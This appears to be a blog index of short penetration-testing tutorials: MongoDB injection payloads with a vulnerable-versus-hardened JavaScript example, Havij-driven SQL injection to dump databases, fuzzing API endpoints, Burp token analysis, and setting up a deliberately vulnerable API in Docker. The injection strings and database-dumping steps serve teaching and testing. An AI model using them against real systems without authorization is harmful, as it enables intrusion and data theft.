Posts

MongoDB Injection Attack

This is a demo exploit for the MongoDB filter option.

Filter: Accessories

Business Logic:

    if (this.category == "Accessories") {
        // ...do something
    }

Exploitation:

    if (this.category == 'Accessories' && this.limit == 3)                // Original
    if (this.category == 'Accessories' || '1' == '1' && this.limit == 3)  // Payload injected
    {
        // ...do something
    }

Capture the request in Burp Suite.

Try combinations of special characters to make the request produce an error:

    "   '   $   {   }   `   ;

Try combinations of Boolean expressions:

    ' && 1 == 1 ' && '1' == '1 ' || 1 == 1 ' || '1' == '1 ' || 1 || ' || 1 || ' ' || '1' == '1

Note: Make sure to encode the payload (CTRL + U).
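The filter injection described above, as an added example that is not part of the original post: it shows why the quote in the payload changes the result set, next to a hardened lookup that never builds an expression. `evalWhere` is a local stand-in for a server-side JavaScript filter (an assumption about how the post's `this.category` expression is evaluated); the sample documents, function names and allowlist are constructed.

```javascript
// Added example: all names and sample data below are constructed.
const products = [
  { name: "Phone case", category: "Accessories", limit: 3 },
  { name: "Laptop", category: "Computers", limit: 3 },
  { name: "Hidden strap", category: "Accessories", limit: 0 },
];

// Stand-in for a server-side JavaScript filter: evaluates `expr` with
// `this` bound to each document, the way the post's expression uses it.
function evalWhere(docs, expr) {
  const predicate = new Function(`return (${expr});`);
  return docs.filter((doc) => Boolean(predicate.call(doc)));
}

// Vulnerable: the request value is pasted into the expression text, so a
// quote in the value ends the string literal and the rest is parsed as code.
function findVulnerable(docs, category) {
  return evalWhere(docs, `this.category == '${category}' && this.limit == 3`);
}

// Hardened: the value must be a string from a fixed allowlist (this also
// rejects non-string input) and is only compared as data in a structured
// filter; no expression text is ever built from the request.
const ALLOWED_CATEGORIES = new Set(["Accessories", "Computers"]);
function findHardened(docs, category) {
  if (typeof category !== "string" || !ALLOWED_CATEGORIES.has(category)) {
    throw new TypeError("invalid category");
  }
  const filter = { category, limit: 3 };
  return docs.filter((doc) =>
    Object.entries(filter).every(([key, value]) => doc[key] === value));
}

const names = (docs) => docs.map((doc) => doc.name);

const injected = "Accessories' || '1' == '1"; // payload shown in the post
console.log("normal    :", names(findVulnerable(products, "Accessories")));
console.log("injected  :", names(findVulnerable(products, injected)));
try {
  findHardened(products, injected);
} catch (err) {
  console.log("hardened  :", err.message);
}
```

Because `&&` binds tighter than `||`, the injected expression matches every document, including the one the `limit == 3` condition was meant to exclude.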

Havij - Advanced Automated SQL Injection

Tool Name: Havij (Educational Purpose Only)

Description: Havij is an automated SQL injection tool designed for penetration testers to identify and exploit SQL injection vulnerabilities in web applications. It streamlines the testing process, allowing security professionals to efficiently assess the security of a website's database interactions.

Download URL: https://www.darknet.org.uk/2010/09/havij-advanced-automated-sql-injection-tool/

Step 1: Enter the application target link in the Havij tool and click Analyze.

Step 2: Get the application details from the Info section.

Step 3: Get the application's databases from the Tables section.

Step 4: Get the application's database records with column details.

Successfully logged in to the application, as shown in the screenshots below.

How to Set Up OpenDNS on a WiFi Router

Step 1: Create an account using the link below.

Web Link: https://signup.opendns.com/homefree/

Step 2: Add your IP address to the OpenDNS account with the following steps: click Add this network > provide a network name > save it.

Step 3: Choose the filtering level you want.

Step 4: The filtering is now in place and prevents access to inappropriate websites, blocks phishing sites, and prevents virus and malware infections. 😀

Basic of Installation Docker in Kali Linux

Install Docker in Kali

Step 1:

    $ sudo apt-get update

Step 2:

    $ sudo apt-get install docker-ce docker-ce-cli containerd.io

Step 3:

    $ sudo apt-get install docker-ce docker-ce-cli containerd.io

Check whether it installed correctly.

Step 4:

    $ sudo docker run hello-world

Step 5: Switch to the root user in Kali.

    $ sudo su

Step 6: Get the GitHub file: https://github.com/rahulunair/vulnerable-api#readme

    $ docker run -tid -p 8081:8081 --name api mkam/vulnerable-api-demo

Step 7: You can now test your API.

    $ curl localhost:8081 -v

To list images:

    $ docker image ls

To pull the image:

    $ docker pull mkam/vulnerable-api-demo

Check the port:

    $ curl localhost:8081 -v

Run the app:

    $ docker run -tid -p 8081:8081 --name api mkam/vulnerable-api-demo

API Authentication - Attacking Token ( Part - 4 ) | Shahul Hameed

Attacking Token via Sequencer

Step 1: Log in to the application and retrieve the token value from the response header.

Step 2: Before clicking Start live capture, make sure to configure the settings as shown in the images below.

Step 3: Make sure to highlight the token value.

Step 4: Click "Analyze Now" to determine the strength of the token value.

Step 5: Use decoding techniques on the token.

API Enumeration - Endpoints Fuzzing ( Part - 3 ) | Shahul Hameed

API Enumeration - Fuzzing

The following endpoint paths can be tested by fuzzing.

Examples of endpoints: v2, resources, books, published, or 1993

Command - 1:

    wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --sc 200 'http://www.example.com/api/v1/books?show=FUZZ'

Command - 2:

    gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://<IP>

API Enumeration via Source Code Discovery

Find the endpoints in the source code via the browser.

Note: JS code formatter: https://beautifier.io/

Thank You :) See you in Next Topic...

Interaction with API Endpoints Manipulation ( Part - 2 ) | Shahul Hameed

Testing Scope: https://catfact.ninja/#/Facts

There are several ways to validate the endpoints:

1. Browser
2. Burp Suite
3. Postman
4. Curl Command

Note: Choose the tool based on your situation.

Query: Returns a random fact with MAX_LENGTH

API End Point Validation: via Browser

Web Browser:

API End Point Validation: via Burp Suite

Positive Case: We provide the expected input in the parameter.

Negative Case: We try to provide unexpected input in the parameter (e.g. input: -1). Verify whether the application handles error exceptions properly.

API End Point Validation: via Postman

API End Point Validation: via Curl Command

Thank You :) See you in Next Topic...